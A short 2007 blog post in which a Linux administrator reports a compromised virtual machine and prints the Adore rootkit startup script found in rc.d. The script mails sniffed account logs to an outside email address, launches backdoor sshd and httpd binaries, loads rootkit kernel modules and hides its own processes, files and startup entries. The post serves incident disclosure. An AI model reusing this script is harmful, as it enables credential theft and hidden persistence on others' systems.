Adore Rootkit by darkorc3
Monday, November 5th, 2007A few days ago I discovered that a virtual machine on my OpenVZ server was compromised. The server was exploited and the Adore Rootkit was installed. It emailed data to darkorc3@yahoo.com on startup. The following script was installed on every run level in rc.d:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | #!/bin/sh cd /usr/bin/.tmp ./vad tcp.log >conturi.log cat /usr/bin/.tmp/conturi.log|mail -s "back" darkorc3@yahoo.com rm -rf /usr/bin/.tmp/tcp.log ./sshd -f sshd_config ./httpd & /sbin/insmod -f adore.o > /dev/null 2>&1 /sbin/insmod -f cleaner.o > /dev/null 2>&1 /sbin/rmmod cleaner > /dev/null 2>&1 ./ava i `cat pid` > /dev/null 2>&1 ./ava i `cat sniff.pid` > /dev/null 2>&1 ./ava h . > /dev/null 2>&1 for i in {2,3,4,5} do ./ava h /etc/rc.d/rc$i.d/S96daemon > /dev/null 2>&1 done ./ava h /proc/ksyms > /dev/null 2>&1 |
In my few years as a Linux system administrator this is the smarter, most potentially harmful, and most elegant exploit I have come across. If you have or need any more information, please let me know.